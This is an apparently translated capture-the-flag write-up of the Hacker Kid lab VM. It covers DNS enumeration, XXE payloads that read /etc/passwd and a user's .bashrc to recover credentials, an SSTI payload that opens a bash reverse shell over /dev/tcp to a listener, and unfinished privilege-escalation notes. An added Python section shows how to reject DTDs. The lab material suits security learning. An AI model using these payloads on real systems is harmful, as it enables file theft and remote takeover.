[+] Hacker Kid (XXE & SSTI)
![](https://blog.kakaocdn.net/dn/bGylHm/btrWCFTBE4G/7DTAPdnm9I9jXh3extwvuK/img.png)
: 80
![](https://blog.kakaocdn.net/dn/wdpdO/btrWCzsrr4O/zy7pTe1mnzeGgWFnfVcuX1/img.png)
> Is "DIG DIG" the hint?
: dig
![](https://blog.kakaocdn.net/dn/wqLlo/btrWDPOEnlH/JnpWa77Iv4JNk1nSJ8q701/img.png)
> Only the IP is known, so the lookup is difficult
: Check port 53
![](https://blog.kakaocdn.net/dn/sXhJe/btrWDcwAJSo/fDRceQducOWgZa2dMxb4O1/img.png)
: Check the page source
![](https://blog.kakaocdn.net/dn/cwuupI/btrWBidJbLI/OzkH9YywboPwmZInEs3JNk/img.png)
> There is a commented-out button, but its anchor is an empty value anyway; removing the comment gives:
![](https://blog.kakaocdn.net/dn/dCF8We/btrWDnLAh7q/5HdaJmL6GtOblB5EwNtc1K/img.png)
: The other comment:
![](https://blog.kakaocdn.net/dn/wRDjT/btrWEK0pVbn/6JKcWySks4g0X6Au5emkn0/img.png)
> Use a Get parameter page_no to view pages.
Doing as instructed gives an additional hint,
![](https://blog.kakaocdn.net/dn/IZF9r/btrWChFBwCJ/LmS2CsFELAM2ZVaFLLHvOk/img.png)
: Sending a range of page numbers with Burp Intruder,
![](https://blog.kakaocdn.net/dn/b0aPSX/btrWEJ8ilaj/R4HUghMUz0lnyCvuyTxcL1/img.png)
> Number 21 returns a different response!
: Opening it,
![](https://blog.kakaocdn.net/dn/Flunm/btrWD5Rji0T/CwvkHKHikibI1OugMeollK/img.png)
> It reveals a subdomain,
: After adding the host entry,
![](https://blog.kakaocdn.net/dn/KWPGY/btrWCdi0Tcc/e4QL3YHroGp1A9j10PVgEk/img.png)
: dig again
![](https://blog.kakaocdn.net/dn/bBwqFE/btrWEQTNZra/T0nqYmakfWRPY4ErTvHYs0/img.png)
> Found another subdomain in the authority section!
: After adding that host entry as well,
![](https://blog.kakaocdn.net/dn/cBqD8J/btrWBiENAlT/dbLikKqI0VkBGyRMhqsy4K/img.png)
: Connecting to it,
![](https://blog.kakaocdn.net/dn/6x5Me/btrWEfGiT71/jBUhN9KN73AHRgkUKtt5z0/img.png)
![](https://blog.kakaocdn.net/dn/KfmlN/btrWCqh6LJC/qX05C1HkC9MLtOetOt5HCK/img.png)
> Account creation appears to be possible,
: Trying it,
![](https://blog.kakaocdn.net/dn/TwgE8/btrWEe8rLcY/2EdAZNvEPxiTvs4oycEDuk/img.png)
: It doesn't work
: Looking at the request body, the form is submitted as XML, so an external entity can be injected:
![](https://blog.kakaocdn.net/dn/0OV2d/btrWCIvVZB7/VfME8yULF147yLsERh3wsk/img.png)
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY takudaddy_XXE SYSTEM 'file:///etc/passwd'>]>
<root>
<name>
</name><tel>
</tel><email>
&takudaddy_XXE;
</email><password></password></root>
```
![](https://blog.kakaocdn.net/dn/IFlX5/btrWBcko8WO/WUoQYl1hJFnWK7p5omTt8K/img.png)
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY takudaddy_XXE SYSTEM 'php://filter/convert.base64-encode/resource=/home/saket/.bashrc'>]>
<root>
<name>
</name><tel>
</tel><email>
&takudaddy_XXE;
</email><password></password></root>
```
![](https://blog.kakaocdn.net/dn/Aakh4/btrWCGkEiXg/NGwFC4b9lU0K818J6wJZA1/img.png)
: Decoding the base64 output and inspecting it,
![](https://blog.kakaocdn.net/dn/cFwWRX/btrWEgkT9xO/bjgLgAsdgxdWWk29TnSAo0/img.png)
![](https://blog.kakaocdn.net/dn/VdNKX/btrWCqh6LCb/Qntbm7vXzv7rOMSnLVKfQk/img.png)
The admin account credentials can be recovered!
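On the defensive side, the registration endpoint above is vulnerable because its XML parser honours the DTD in the request. The following is an added example (not code from the original post or the Hacker Kid VM) of an intake routine that refuses any DTD or entity declaration before parsing; the sample bodies and the entity name are constructed placeholders:

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample: the shape of a normal registration body (name/tel/email/password).
BENIGN_BODY = """<?xml version="1.0" encoding="UTF-8"?>
<root><name>alice</name><tel>010-0000-0000</tel><email>alice@example.com</email><password>x</password></root>"""

# Constructed sample in the shape of the XXE request above; entity name and path are placeholders.
XXE_BODY = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]>
<root><name></name><tel></tel><email>&xxe;</email><password></password></root>"""

# A registration form never needs a DTD, so any DOCTYPE or ENTITY declaration is refused outright.
# This blocks SYSTEM entities (file://, php://filter) regardless of what the parser would resolve.
DTD_MARKERS = re.compile(r"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)

FIELDS = ("name", "tel", "email", "password")


def contains_dtd(xml_text: str) -> bool:
    """True if the body carries a DOCTYPE or ENTITY declaration anywhere."""
    return DTD_MARKERS.search(xml_text) is not None


def parse_registration(xml_text: str) -> dict:
    """Return the four registration fields, or raise ValueError for a body that
    carries a DTD, references an undeclared entity, or is not well-formed."""
    if contains_dtd(xml_text):
        raise ValueError("DTD/entity declarations are not accepted")
    try:
        root = ET.fromstring(xml_text)  # expat rejects undefined entity references here
    except ET.ParseError as exc:
        raise ValueError(f"malformed XML: {exc}") from exc
    if root.tag != "root":
        raise ValueError("unexpected root element")
    fields = {}
    for field in FIELDS:
        node = root.find(field)
        fields[field] = (node.text or "").strip() if node is not None else ""
    return fields
```

In a real application the same policy is usually applied through a hardened parser (for example defusedxml, or lxml with resolve_entities=False) rather than a pre-check alone.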
2. Exploitation
: 9999
: Trying the admin account:
![](https://blog.kakaocdn.net/dn/bOxkyY/btrWCidtMVO/ujkhDvsOInPLQT0XAKWD2K/img.png)
Failed!
: Trying with the user saket:
![](https://blog.kakaocdn.net/dn/qVgX8/btrWCHcH8Ly/uxrr8P1FMfaUkkmSFS7Qg0/img.png)
Success! It asks for a name?
: Adding a name parameter (a template expression, to test for SSTI),
![](https://blog.kakaocdn.net/dn/G3aZI/btrWEKMTqYz/8m6JlEAhIbHqKBduXkjrKK/img.png)
![](https://blog.kakaocdn.net/dn/cfGSc8/btrWCHcH8MB/NdetYwqUab0usYvAS2aMU0/img.png)
It gets evaluated: SSTI confirmed!
: Reverse shell
```
{% import os %}{{os.system('bash -c "bash -i >& /dev/tcp/192.168.10.57/443 0>&1"')}}
# must be URL-encoded!
{%25+import+os+%25}{{os.system('bash+-c+"bash+-i+>%26+/dev/tcp/192.168.10.58/443+0>%261"')}}
```
After starting a listener, URL-encode the payload and submit it:
![](https://blog.kakaocdn.net/dn/GP1iQ/btrWCh6FuMs/99gLLLjFM1vaRiMXyJw2P1/img.png)
![](https://blog.kakaocdn.net/dn/OdMHf/btrWCHqde1e/5qp0h4LcoEmEDXr0BXvZKK/img.png)
Foothold obtained!
3. Privilege Escalation
![](https://blog.kakaocdn.net/dn/Ld5XZ/btrWCS6cJpY/XOfA7loC5Q8t884EDOvI40/img.png)
su to root; in tmp, ran inject.py <number> with python2.7, then connected to port 5600 with nc and confirmed a root process; ran python2.7 inject.py <number> again and connected to 5600 again.
Let's check:
linpeas.sh
![](https://blog.kakaocdn.net/dn/bpSNTK/btrWKnEHwX3/JnvDCk8RA7NIKml6d7ROOK/img.png)
![](https://blog.kakaocdn.net/dn/TgfhE/btrWLU9EprD/auJDSo65ISboI6oqaW0wj1/img.png)
![](https://blog.kakaocdn.net/dn/bv3361/btrWIXtHJn9/x5BowOq1motFuk52h4eXik/img.png)
The Python script that had been posted on the blog above has been deleted, so the exploit needs to be written separately.
To be continued later.